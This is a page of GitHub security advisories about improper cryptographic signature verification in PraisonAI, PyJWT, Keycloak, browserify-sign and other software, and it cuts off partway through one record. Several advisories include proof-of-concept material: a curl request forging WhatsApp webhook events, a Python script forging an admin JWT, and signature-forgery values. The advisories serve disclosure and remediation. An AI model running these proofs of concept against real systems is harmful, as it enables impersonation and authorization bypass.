CWE-347
AllowedImproper Verification of Cryptographic Signature
Abstraction: Base · Status: Draft
The product does not verify, or incorrectly verifies, the cryptographic signature for data.
1123 vulnerabilities reference this CWE, most recent first.
GHSA-X92V-RPX6-P6CW
Vulnerability from github – Published: 2026-06-18 13:58 – Updated: 2026-06-18 13:58The WhatsApp and Linear bot adapters verify the inbound webhook HMAC signature only when a secret is configured. When the secret environment variable is unset — the default on a fresh install and common in development — verification is skipped entirely and the webhook body is parsed and dispatched as a genuine, trusted event. A remote, unauthenticated attacker who can reach the bot's webhook endpoint can inject arbitrary platform events.
Affected code:
WhatsApp - src/praisonai/praisonai/bots/whatsapp.py
- init (line 108): self._app_secret = app_secret or os.environ.get("WHATSAPP_APP_SECRET", "") -> defaults to ""
- route (line 246): app.router.add_post(self._webhook_path, self._handle_webhook) -> default path "/webhook"
- _handle_webhook (lines 585-595): if self._app_secret: gates the ENTIRE check; when falsy the body is
json.loads()'d and dispatched to _process_webhook_data() with no verification.
Linear - src/praisonai/praisonai/bots/linear.py
- init (line 86): self._signing_secret = signing_secret or os.environ.get("LINEAR_WEBHOOK_SECRET", "") -> ""
- _handle_webhook (lines 244-248): same if self._signing_secret: fail-open guard.
- start() (lines 169-170): only logs a warning; does not fail closed.
The _verify_signature implementations themselves are correct (constant-time HMAC-SHA256); the defect is that verification is bypassed when the secret is absent.
Impact: - WhatsApp: attacker POSTs a crafted Meta Cloud API payload spoofing any sender and message text; injected into agent sessions and processed as a real user message (prompt injection, unauthorized agent/command invocation, contact impersonation). - Linear: attacker POSTs forged AgentSession / Comment events, causing the agent to act on and comment on issues no legitimate event referenced. The webhook routes require no other authentication, so exploitation needs only network reachability.
Proof of concept (bot started without the secret - the default):
curl -X POST http://VICTIM:PORT/webhook \ -H 'Content-Type: application/json' \ -d '{"object":"whatsapp_business_account","entry":[{"changes":[{"value": {"messages":[{"from":"15551234567","id":"wamid.x","type":"text", "text":{"body":"attacker-injected message"}}]}}]}]}' # No X-Hub-Signature-256 header; bot returns 200 and processes the message. # Linear: omit LINEAR_WEBHOOK_SECRET and POST without a Linear-Signature header.
A self-contained PoC that executes the real _handle_webhook / _verify_signature source extracted from the repo confirms: secret unset -> status 200, payload dispatched (VULNERABLE); secret set + no signature -> status 403, nothing dispatched (control).
Remediation: Fail closed. When no secret is configured, reject all webhooks (HTTP 403) and refuse to start the adapter unless a secret is set (or an explicit, clearly-named insecure-dev override is given):
if not self._app_secret: return web.Response(status=403, text="Webhook secret not configured") signature = request.headers.get("X-Hub-Signature-256", "") if not self._verify_signature(body, signature): return web.Response(status=403, text="Invalid signature")
Distinct from prior advisories: The accepted default-insecure advisories cover a different surface/mechanism — CALL_SERVER_TOKEN unset (GHSA-86qc-r5v2-v6x6) and the JWT key default "dev-secret-change-me" (GHSA-3qg8-5g3r-79v5). This is in the bot webhook adapters and the mechanism is skipping signature verification entirely when the secret is absent, not a weak default key.
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 4.6.52"
},
"package": {
"ecosystem": "PyPI",
"name": "praisonai"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "4.6.59"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [],
"database_specific": {
"cwe_ids": [
"CWE-345",
"CWE-347"
],
"github_reviewed": true,
"github_reviewed_at": "2026-06-18T13:58:08Z",
"nvd_published_at": null,
"severity": "HIGH"
},
"details": "The WhatsApp and Linear bot adapters verify the inbound webhook HMAC signature only\nwhen a secret is configured. When the secret environment variable is unset \u2014 the\ndefault on a fresh install and common in development \u2014 verification is skipped entirely\nand the webhook body is parsed and dispatched as a genuine, trusted event. A remote,\nunauthenticated attacker who can reach the bot\u0027s webhook endpoint can inject arbitrary\nplatform events.\n\nAffected code:\n\nWhatsApp - src/praisonai/praisonai/bots/whatsapp.py\n- __init__ (line 108): self._app_secret = app_secret or os.environ.get(\"WHATSAPP_APP_SECRET\", \"\") -\u003e defaults to \"\"\n- route (line 246): app.router.add_post(self._webhook_path, self._handle_webhook) -\u003e default path \"/webhook\"\n- _handle_webhook (lines 585-595): `if self._app_secret:` gates the ENTIRE check; when falsy the body is\n json.loads()\u0027d and dispatched to _process_webhook_data() with no verification.\n\nLinear - src/praisonai/praisonai/bots/linear.py\n- __init__ (line 86): self._signing_secret = signing_secret or os.environ.get(\"LINEAR_WEBHOOK_SECRET\", \"\") -\u003e \"\"\n- _handle_webhook (lines 244-248): same `if self._signing_secret:` fail-open guard.\n- start() (lines 169-170): only logs a warning; does not fail closed.\n\nThe _verify_signature implementations themselves are correct (constant-time HMAC-SHA256);\nthe defect is that verification is bypassed when the secret is absent.\n\nImpact:\n- WhatsApp: attacker POSTs a crafted Meta Cloud API payload spoofing any sender and message\n text; injected into agent sessions and processed as a real user message (prompt injection,\n unauthorized agent/command invocation, contact impersonation).\n- Linear: attacker POSTs forged AgentSession / Comment events, causing the agent to act on and\n comment on issues no legitimate event referenced.\nThe webhook routes require no other authentication, so exploitation needs only network\nreachability.\n\nProof of concept (bot started without the secret - the default):\n\n curl -X POST http://VICTIM:PORT/webhook \\\n -H \u0027Content-Type: application/json\u0027 \\\n -d \u0027{\"object\":\"whatsapp_business_account\",\"entry\":[{\"changes\":[{\"value\":\n {\"messages\":[{\"from\":\"15551234567\",\"id\":\"wamid.x\",\"type\":\"text\",\n \"text\":{\"body\":\"attacker-injected message\"}}]}}]}]}\u0027\n # No X-Hub-Signature-256 header; bot returns 200 and processes the message.\n # Linear: omit LINEAR_WEBHOOK_SECRET and POST without a Linear-Signature header.\n\nA self-contained PoC that executes the real _handle_webhook / _verify_signature source\nextracted from the repo confirms: secret unset -\u003e status 200, payload dispatched (VULNERABLE);\nsecret set + no signature -\u003e status 403, nothing dispatched (control).\n\nRemediation:\nFail closed. When no secret is configured, reject all webhooks (HTTP 403) and refuse to start\nthe adapter unless a secret is set (or an explicit, clearly-named insecure-dev override is given):\n\n if not self._app_secret:\n return web.Response(status=403, text=\"Webhook secret not configured\")\n signature = request.headers.get(\"X-Hub-Signature-256\", \"\")\n if not self._verify_signature(body, signature):\n return web.Response(status=403, text=\"Invalid signature\")\n\nDistinct from prior advisories:\nThe accepted default-insecure advisories cover a different surface/mechanism \u2014 CALL_SERVER_TOKEN\nunset (GHSA-86qc-r5v2-v6x6) and the JWT key default \"dev-secret-change-me\" (GHSA-3qg8-5g3r-79v5).\nThis is in the bot webhook adapters and the mechanism is skipping signature verification entirely\nwhen the secret is absent, not a weak default key.",
"id": "GHSA-x92v-rpx6-p6cw",
"modified": "2026-06-18T13:58:08Z",
"published": "2026-06-18T13:58:08Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-x92v-rpx6-p6cw"
},
{
"type": "PACKAGE",
"url": "https://github.com/MervinPraison/PraisonAI"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:L",
"type": "CVSS_V3"
}
],
"summary": "PraisonAI: Webhook signature verification skipped (fail-open) when secret unset, allowing forged inbound webhooks (WhatsApp \u0026 Linear bots)"
}
GHSA-X9W5-V3Q2-3RHW
Vulnerability from github – Published: 2023-10-26 20:53 – Updated: 2025-02-13 19:19Summary
An upper bound check issue in dsaVerify function allows an attacker to construct signatures that can be successfully verified by any public key, thus leading to a signature forgery attack.
Details
In dsaVerify function, it checks whether the value of the signature is legal by calling function checkValue, namely, whether r and s are both in the interval [1, q - 1]. However, the second line of the checkValue function wrongly checks the upper bound of the passed parameters, since the value of b.cmp(q) can only be 0, 1 and -1, and it can never be greater than q.
In this way, although the values of s cannot be 0, an attacker can achieve the same effect as zero by setting its value to q, and then send (r, s) = (1, q) to pass the verification of any public key.
Impact
All places in this project that involve DSA verification of user-input signatures will be affected by this vulnerability.
Fix PR:
Since the temporary private fork was deleted, here's a webarchive of the PR discussion and diff pages: PR webarchive.zip
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 4.2.1"
},
"package": {
"ecosystem": "npm",
"name": "browserify-sign"
},
"ranges": [
{
"events": [
{
"introduced": "2.6.0"
},
{
"fixed": "4.2.2"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2023-46234"
],
"database_specific": {
"cwe_ids": [
"CWE-347"
],
"github_reviewed": true,
"github_reviewed_at": "2023-10-26T20:53:21Z",
"nvd_published_at": "2023-10-26T15:15:09Z",
"severity": "HIGH"
},
"details": "### Summary\nAn upper bound check issue in `dsaVerify` function allows an attacker to construct signatures that can be successfully verified by any public key, thus leading to a signature forgery attack.\n\n### Details\nIn `dsaVerify` function, it checks whether the value of the signature is legal by calling function `checkValue`, namely, whether `r` and `s` are both in the interval `[1, q - 1]`. However, the second line of the `checkValue` function wrongly checks the upper bound of the passed parameters, since the value of `b.cmp(q)` can only be `0`, `1` and `-1`, and it can never be greater than `q`. \n\nIn this way, although the values of `s` cannot be `0`, an attacker can achieve the same effect as zero by setting its value to `q`, and then send `(r, s) = (1, q)` to pass the verification of any public key.\n\n### Impact\nAll places in this project that involve DSA verification of user-input signatures will be affected by this vulnerability.\n\n\n### Fix PR:\nSince the temporary private fork was deleted, here\u0027s a webarchive of the PR discussion and diff pages: [PR webarchive.zip](https://github.com/browserify/browserify-sign/files/13172957/PR.webarchive.zip)",
"id": "GHSA-x9w5-v3q2-3rhw",
"modified": "2025-02-13T19:19:37Z",
"published": "2023-10-26T20:53:21Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/browserify/browserify-sign/security/advisories/GHSA-x9w5-v3q2-3rhw"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-46234"
},
{
"type": "WEB",
"url": "https://github.com/browserify/browserify-sign/commit/85994cd6348b50f2fd1b73c54e20881416f44a30"
},
{
"type": "PACKAGE",
"url": "https://github.com/browserify/browserify-sign"
},
{
"type": "WEB",
"url": "https://lists.debian.org/debian-lts-announce/2023/10/msg00040.html"
},
{
"type": "WEB",
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/3HUE6ZR5SL73KHL7XUPAOEL6SB7HUDT2"
},
{
"type": "WEB",
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6PVVPNSAGSDS63HQ74PJ7MZ3MU5IYNVZ"
},
{
"type": "WEB",
"url": "https://www.debian.org/security/2023/dsa-5539"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
"type": "CVSS_V3"
}
],
"summary": "browserify-sign upper bound check issue in `dsaVerify` leads to a signature forgery attack"
}
GHSA-XCGW-94HJ-93R7
Vulnerability from github – Published: 2022-05-24 19:20 – Updated: 2022-05-24 19:20The Zoom Client for Meetings for Windows installer before version 5.5.4 does not properly verify the signature of files with .msi, .ps1, and .bat extensions. This could lead to a malicious actor installing malicious software on a customer's computer.
{
"affected": [],
"aliases": [
"CVE-2021-34420"
],
"database_specific": {
"cwe_ids": [
"CWE-347"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2021-11-11T23:15:00Z",
"severity": "HIGH"
},
"details": "The Zoom Client for Meetings for Windows installer before version 5.5.4 does not properly verify the signature of files with .msi, .ps1, and .bat extensions. This could lead to a malicious actor installing malicious software on a customer\u0027s computer.",
"id": "GHSA-xcgw-94hj-93r7",
"modified": "2022-05-24T19:20:36Z",
"published": "2022-05-24T19:20:36Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-34420"
},
{
"type": "WEB",
"url": "https://explore.zoom.us/en/trust/security/security-bulletin"
},
{
"type": "WEB",
"url": "https://medium.com/manomano-tech/a-red-team-operation-leveraging-a-zero-day-vulnerability-in-zoom-80f57fb0822e"
}
],
"schema_version": "1.4.0",
"severity": []
}
GHSA-XCWW-QXQ8-PG8C
Vulnerability from github – Published: 2025-07-08 12:31 – Updated: 2025-07-08 12:31A vulnerability has been identified in TIA Administrator (All versions < V3.0.6). The affected application improperly validates code signing certificates. This could allow an attacker to bypass the check and exceute arbitrary code during installations.
{
"affected": [],
"aliases": [
"CVE-2025-23364"
],
"database_specific": {
"cwe_ids": [
"CWE-347"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-07-08T11:15:26Z",
"severity": "MODERATE"
},
"details": "A vulnerability has been identified in TIA Administrator (All versions \u003c V3.0.6). The affected application improperly validates code signing certificates.\nThis could allow an attacker to bypass the check and exceute arbitrary code during installations.",
"id": "GHSA-xcww-qxq8-pg8c",
"modified": "2025-07-08T12:31:02Z",
"published": "2025-07-08T12:31:02Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-23364"
},
{
"type": "WEB",
"url": "https://cert-portal.siemens.com/productcert/html/ssa-573669.html"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"type": "CVSS_V4"
}
]
}
GHSA-XGFV-XPX8-QHCR
Vulnerability from github – Published: 2024-10-14 20:54 – Updated: 2024-12-20 17:48A flaw exists in the SAML signature validation method within the Keycloak XMLSignatureUtil class. The method incorrectly determines whether a SAML signature is for the full document or only for specific assertions based on the position of the signature in the XML document, rather than the Reference element used to specify the signed element. This flaw allows attackers to create crafted responses that can bypass the validation, potentially leading to privilege escalation or impersonation attacks.
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 22.0.12"
},
"package": {
"ecosystem": "Maven",
"name": "org.keycloak:keycloak-saml-core"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "22.0.13"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 24.0.7"
},
"package": {
"ecosystem": "Maven",
"name": "org.keycloak:keycloak-saml-core"
},
"ranges": [
{
"events": [
{
"introduced": "23.0.0"
},
{
"fixed": "24.0.8"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 25.0.5"
},
"package": {
"ecosystem": "Maven",
"name": "org.keycloak:keycloak-saml-core"
},
"ranges": [
{
"events": [
{
"introduced": "25.0.0"
},
{
"fixed": "25.0.6"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2024-8698"
],
"database_specific": {
"cwe_ids": [
"CWE-347"
],
"github_reviewed": true,
"github_reviewed_at": "2024-10-14T20:54:52Z",
"nvd_published_at": null,
"severity": "HIGH"
},
"details": "A flaw exists in the SAML signature validation method within the Keycloak XMLSignatureUtil class. The method incorrectly determines whether a SAML signature is for the full document or only for specific assertions based on the position of the signature in the XML document, rather than the Reference element used to specify the signed element. This flaw allows attackers to create crafted responses that can bypass the validation, potentially leading to privilege escalation or impersonation attacks.",
"id": "GHSA-xgfv-xpx8-qhcr",
"modified": "2024-12-20T17:48:35Z",
"published": "2024-10-14T20:54:52Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/keycloak/keycloak/security/advisories/GHSA-xgfv-xpx8-qhcr"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-8698"
},
{
"type": "WEB",
"url": "https://github.com/keycloak/keycloak/releases/tag/25.0.6"
},
{
"type": "PACKAGE",
"url": "https://github.com/keycloak/keycloak"
},
{
"type": "WEB",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2311641"
},
{
"type": "WEB",
"url": "https://access.redhat.com/security/cve/CVE-2024-8698"
},
{
"type": "WEB",
"url": "https://access.redhat.com/errata/RHSA-2024:8826"
},
{
"type": "WEB",
"url": "https://access.redhat.com/errata/RHSA-2024:8824"
},
{
"type": "WEB",
"url": "https://access.redhat.com/errata/RHSA-2024:8823"
},
{
"type": "WEB",
"url": "https://access.redhat.com/errata/RHSA-2024:6890"
},
{
"type": "WEB",
"url": "https://access.redhat.com/errata/RHSA-2024:6889"
},
{
"type": "WEB",
"url": "https://access.redhat.com/errata/RHSA-2024:6888"
},
{
"type": "WEB",
"url": "https://access.redhat.com/errata/RHSA-2024:6887"
},
{
"type": "WEB",
"url": "https://access.redhat.com/errata/RHSA-2024:6886"
},
{
"type": "WEB",
"url": "https://access.redhat.com/errata/RHSA-2024:6882"
},
{
"type": "WEB",
"url": "https://access.redhat.com/errata/RHSA-2024:6880"
},
{
"type": "WEB",
"url": "https://access.redhat.com/errata/RHSA-2024:6879"
},
{
"type": "WEB",
"url": "https://access.redhat.com/errata/RHSA-2024:6878"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:L/A:L",
"type": "CVSS_V3"
}
],
"summary": "Improper Verification of SAML Responses Leading to Privilege Escalation in Keycloak"
}
GHSA-XGMM-8J9V-C9WX
Vulnerability from github – Published: 2026-06-15 19:28 – Updated: 2026-06-15 19:28[!NOTE] Exploitation requires a verifier configured with both symmetric and asymmetric algorithms in
algorithms=[…]and a raw-JSON JWK as thekey=argument, both contrary to documented usage, hence the High attack-complexity rating.
Summary
When the verifier is decoding JSON Web Tokens, while supporting both asymmetric and HMAC algorithms, the library does not validate use of JSON Web Keys in HMAC algorithm, allowing attacker to use the issuer public key as the secret key for HMAC algorithm.
Details
In JWT algorithm confusion attack, the verifier is mistakenly use of public key to be used as the shared secret in symmetric algorithms. In pyjwt case, when the verifier is supporting both HMAC with other asymmetric algorithm and mistakenly using the public key of the issuer to verify the token as demonstrated in the following example:
jws.decode(token, key=rsa_jwk_json, algorithms=["HS256","RS256"]))
An attacker who specifies in the token header to use HMAC, will cause the verifier to accept the JWK as the secret key in HMAC algorithm. The attacker will be able to forge JWT signed with the public key of the issuer to impersonate any user.
If we look on current protections implemented in the library, at class HMACAlgorithm:
def prepare_key(self, key: str | bytes) -> bytes:
key_bytes = force_bytes(key)
if is_pem_format(key_bytes) or is_ssh_key(key_bytes):
raise InvalidKeyError(
"The specified key is an asymmetric key or x509 certificate and"
" should not be used as an HMAC secret."
)
return key_bytes
We can observe that there is a protection against this type of attacks but only when the verifier is using PEM format or SSH key to verify the token. JSON Web Keys, on the other hand will pass the validation.
In The following example:
jws.decode(token, key=rsa_jwk_json, algorithms=["HS256","RS256"]))
There is indeed a wrong implementation of the verifier, but a stronger protection in the library side will prevent and protect against those type of misconfiugrations.
The bypass happens only if the verifier: (a) allows HS* and an asymmetric algorithm in the same call and (b) passes a public-key value as key.
PoC
Please run the code and observe the payload printed in clear text({"sub":"alice","admin":true}')
from jwt.api_jws import PyJWS
import json, base64, hmac, hashlib
def b64u(b): return base64.urlsafe_b64encode(b).rstrip(b"=")
# Public RSA JWK (public by design)
rsa_jwk_json = json.dumps({"kty":"RSA","n":"AQAB","e":"AQAB"})
# Attacker-crafted token: flip to HS256 and choose claims
header = b64u(b'{"alg":"HS256","typ":"JWT"}')
payload = b64u(b'{"sub":"alice","admin":true}')
signing = header + b"." + payload
# Sign with HMAC using the PUBLIC JWK JSON TEXT as the “secret”
sig = hmac.new(rsa_jwk_json.encode(), signing, hashlib.sha256).digest()
token = (signing + b"." + b64u(sig)).decode()
# Vulnerable verifier: mixed families + JWK JSON string as key
jws = PyJWS()
print(jws.decode(token, key=rsa_jwk_json, algorithms=["HS256","RS256"]))
# -> b'{"sub":"alice","admin":true}'
Impact
Unauthenticated token forgery → full identity/role impersonation at the resource server (authorization bypass).
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "pyjwt"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "2.13.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-48526"
],
"database_specific": {
"cwe_ids": [
"CWE-287",
"CWE-347"
],
"github_reviewed": true,
"github_reviewed_at": "2026-06-15T19:28:06Z",
"nvd_published_at": "2026-05-28T16:16:29Z",
"severity": "HIGH"
},
"details": "\u003e [!NOTE]\n\u003e Exploitation requires a verifier configured with both symmetric and asymmetric algorithms in `algorithms=[\u2026]` and a raw-JSON JWK as the `key=` argument, both contrary to documented usage, hence the High attack-complexity rating.\n\n### Summary\nWhen the verifier is decoding JSON Web Tokens, while supporting both asymmetric and HMAC algorithms, the library does not validate use of JSON Web Keys in HMAC algorithm, allowing attacker to use the issuer public key as the secret key for HMAC algorithm. \n\n### Details\nIn JWT algorithm confusion attack, the verifier is mistakenly use of public key to be used as the shared secret in symmetric algorithms.\nIn pyjwt case, when the verifier is supporting both HMAC with other asymmetric algorithm and mistakenly using the public key of the issuer to verify the token as demonstrated in the following example:\n \n`jws.decode(token, key=rsa_jwk_json, algorithms=[\"HS256\",\"RS256\"])) `\n\nAn attacker who specifies in the token header to use HMAC, will cause the verifier to accept the JWK as the secret key in HMAC algorithm. \nThe attacker will be able to forge JWT signed with the public key of the issuer to impersonate any user. \n\nIf we look on current protections implemented in the library, at class HMACAlgorithm:\n\n```\n def prepare_key(self, key: str | bytes) -\u003e bytes:\n key_bytes = force_bytes(key)\n\n if is_pem_format(key_bytes) or is_ssh_key(key_bytes):\n raise InvalidKeyError(\n \"The specified key is an asymmetric key or x509 certificate and\"\n \" should not be used as an HMAC secret.\"\n )\n\n return key_bytes\n```\nWe can observe that there is a protection against this type of attacks but only when the verifier is using PEM format or SSH key to verify the token. JSON Web Keys, on the other hand will pass the validation.\n\nIn The following example:\n`jws.decode(token, key=rsa_jwk_json, algorithms=[\"HS256\",\"RS256\"])) `\nThere is indeed a wrong implementation of the verifier, but a stronger protection in the library side will prevent and protect against those type of misconfiugrations. \n\nThe bypass happens only if the verifier:\n (a) allows HS* and an asymmetric algorithm in the same call and (b) passes a public-key value as key.\n\n### PoC\nPlease run the code and observe the payload printed in clear text({\"sub\":\"alice\",\"admin\":true}\u0027)\n\n```\nfrom jwt.api_jws import PyJWS\nimport json, base64, hmac, hashlib\n\ndef b64u(b): return base64.urlsafe_b64encode(b).rstrip(b\"=\")\n\n# Public RSA JWK (public by design)\nrsa_jwk_json = json.dumps({\"kty\":\"RSA\",\"n\":\"AQAB\",\"e\":\"AQAB\"})\n\n# Attacker-crafted token: flip to HS256 and choose claims\nheader = b64u(b\u0027{\"alg\":\"HS256\",\"typ\":\"JWT\"}\u0027)\npayload = b64u(b\u0027{\"sub\":\"alice\",\"admin\":true}\u0027)\nsigning = header + b\".\" + payload\n\n# Sign with HMAC using the PUBLIC JWK JSON TEXT as the \u201csecret\u201d\nsig = hmac.new(rsa_jwk_json.encode(), signing, hashlib.sha256).digest()\ntoken = (signing + b\".\" + b64u(sig)).decode()\n\n# Vulnerable verifier: mixed families + JWK JSON string as key\njws = PyJWS()\nprint(jws.decode(token, key=rsa_jwk_json, algorithms=[\"HS256\",\"RS256\"]))\n# -\u003e b\u0027{\"sub\":\"alice\",\"admin\":true}\u0027\n```\n\n\n### Impact\nUnauthenticated token forgery \u2192 full identity/role impersonation at the resource server (authorization bypass).",
"id": "GHSA-xgmm-8j9v-c9wx",
"modified": "2026-06-15T19:28:06Z",
"published": "2026-06-15T19:28:06Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/jpadilla/pyjwt/security/advisories/GHSA-xgmm-8j9v-c9wx"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-48526"
},
{
"type": "PACKAGE",
"url": "https://github.com/jpadilla/pyjwt"
},
{
"type": "WEB",
"url": "https://github.com/pypa/advisory-database/tree/main/vulns/pyjwt/PYSEC-2026-179.yaml"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N",
"type": "CVSS_V3"
}
],
"summary": "PyJWT: Public-key JWK accepted as HMAC secret enables forged HS256 tokens when mixed families are allowed"
}
GHSA-XH97-72WW-2W58
Vulnerability from github – Published: 2022-05-04 00:00 – Updated: 2024-04-09 15:11Duplicate Advisory
This advisory has been withdrawn because it is a duplicate of GHSA-hw42-3568-wj87. This link is maintained to preserve external references.
Summary
The vulnerability impacts only users of the IdTokenVerifier class. The verify method in IdTokenVerifier does not validate the signature before verifying the claims (e.g., iss, aud, etc.). Signature verification makes sure that the token's payload comes from valid provider, not from someone else.
An attacker can provide a compromised token with modified payload like email or phone number. The token will pass the validation by the library. Once verified, modified payload can be used by the application.
If the application sends verified IdToken to other service as is like for auth - the risk is low, because the backend of the service is expected to check the signature and fail the request.
Reporter: Tamjid al Rahat, contributor
Patches
The issue was fixed in the 1.33.3 version of the library
Proof of Concept
To reproduce, one needs to call the verify function with an IdToken instance that contains a malformed signature to successfully bypass the checks inside the verify function.
/** A default http transport factory for testing */
static class DefaultHttpTransportFactory implements HttpTransportFactory {
public HttpTransport create() {
return new NetHttpTransport();
}
}
// The below token has some modified bits in the signature
private static final String SERVICE_ACCOUNT_RS256_TOKEN_BAD_SIGNATURE =
"eyJhbGciOiJSUzI1NiIsImtpZCI6IjJlZjc3YjM4YTFiMDM3MDQ4NzA0MzkxNmFjYmYyN2Q3NG" +
"VkZDA4YjEiLCJ0eXAiOiJKV1QifQ.eyJhdWQiOiJodHRwczovL2V4YW1wbGUuY29tL2F1ZGllbm" +
"NlIiwiZXhwIjoxNTg3NjMwNTQzLCJpYXQiOjE1ODc2MjY5NDMsImlzcyI6InNvbWUgaXNzdWVy" +
"Iiwic3ViIjoic29tZSBzdWJqZWN0In0.gGOQW0qQgs4jGUmCsgRV83RqsJLaEy89-ZOG6p1u0Y26" +
"FyY06b6Odgd7xXLsSTiiSnch62dl0Lfi9D0x2ByxvsGOCbovmBl2ZZ0zHr1wpc4N0XS9lMUq5RJ" +
"QbonDibxXG4nC2zroDfvD0h7i-L8KMXeJb9pYwW7LkmrM_YwYfJnWnZ4bpcsDjojmPeUBlACg7tjjOgBFby" +
"QZvUtaERJwSRlaWibvNjof7eCVfZChE0PwBpZc_cGqSqKXv544L4ttqdCnm0NjqrTATXwC4gYx" +
"ruevkjHfYI5ojcQmXoWDJJ0-_jzfyPE4MFFdCFgzLgnfIOwe5ve0MtquKuv2O0pgvg";
IdTokenVerifier tokenVerifier =
new IdTokenVerifier.Builder()
.setClock(clock)
.setCertificatesLocation("https://www.googleapis.com/robot/v1/metadata/x509/integration-tests%40chingor-test.iam.gserviceaccount.com")
.setHttpTransportFactory(new DefaultHttpTransportFactory())
.build();
// verification will return true despite modified signature for versions <1.33.3
tokenVerifier.verify(IdToken.parse(GsonFactory.getDefaultInstance(), SERVICE_ACCOUNT_RS256_TOKEN_BAD_SIGNATURE));
Remediation and Mitigation
Update to the version 1.33.3 or higher
If the library used indirectly or cannot be updated for any reason you can use similar IdToken verifiers provided by Google that already has signature verification. For example: google-auth-library-java google-api-java-client
Timeline
Date reported: 12 Dec 2021 Date fixed: 13 Apr 2022 Date disclosed: 2 May 2022
For more information
If you have any questions or comments about this advisory: * Open an issue in the google-oauth-java-client repo
{
"affected": [
{
"package": {
"ecosystem": "Maven",
"name": "com.google.oauth-client:google-oauth-client"
},
"ranges": [
{
"events": [
{
"introduced": "1.16.0-rc"
},
{
"fixed": "1.33.3"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [],
"database_specific": {
"cwe_ids": [
"CWE-347"
],
"github_reviewed": true,
"github_reviewed_at": "2022-06-09T23:51:47Z",
"nvd_published_at": "2022-05-03T16:15:00Z",
"severity": "HIGH"
},
"details": "### Duplicate Advisory\nThis advisory has been withdrawn because it is a duplicate of GHSA-hw42-3568-wj87. This link is maintained to preserve external references.\n\n### Summary\nThe vulnerability impacts only users of the IdTokenVerifier class. The verify method in IdTokenVerifier does not validate the signature before verifying the claims (e.g., iss, aud, etc.). Signature verification makes sure that the token\u0027s payload comes from valid provider, not from someone else.\n\nAn attacker can provide a compromised token with modified payload like email or phone number. The token will pass the validation by the library. Once verified, modified payload can be used by the application. \n\nIf the application sends verified IdToken to other service as is like for auth - the risk is low, because the backend of the service is expected to check the signature and fail the request. \n\nReporter: [Tamjid al Rahat](https://github.com/tamjidrahat), contributor\n\n### Patches\nThe issue was fixed in the 1.33.3 version of the library\n\n### Proof of Concept\nTo reproduce, one needs to call the verify function with an IdToken instance that contains a malformed signature to successfully bypass the checks inside the verify function.\n\n```\n /** A default http transport factory for testing */\n static class DefaultHttpTransportFactory implements HttpTransportFactory {\n public HttpTransport create() {\n return new NetHttpTransport();\n }\n }\n\n// The below token has some modified bits in the signature\n private static final String SERVICE_ACCOUNT_RS256_TOKEN_BAD_SIGNATURE = \n\"eyJhbGciOiJSUzI1NiIsImtpZCI6IjJlZjc3YjM4YTFiMDM3MDQ4NzA0MzkxNmFjYmYyN2Q3NG\" +\n\"VkZDA4YjEiLCJ0eXAiOiJKV1QifQ.eyJhdWQiOiJodHRwczovL2V4YW1wbGUuY29tL2F1ZGllbm\" +\n\"NlIiwiZXhwIjoxNTg3NjMwNTQzLCJpYXQiOjE1ODc2MjY5NDMsImlzcyI6InNvbWUgaXNzdWVy\" +\n\"Iiwic3ViIjoic29tZSBzdWJqZWN0In0.gGOQW0qQgs4jGUmCsgRV83RqsJLaEy89-ZOG6p1u0Y26\" 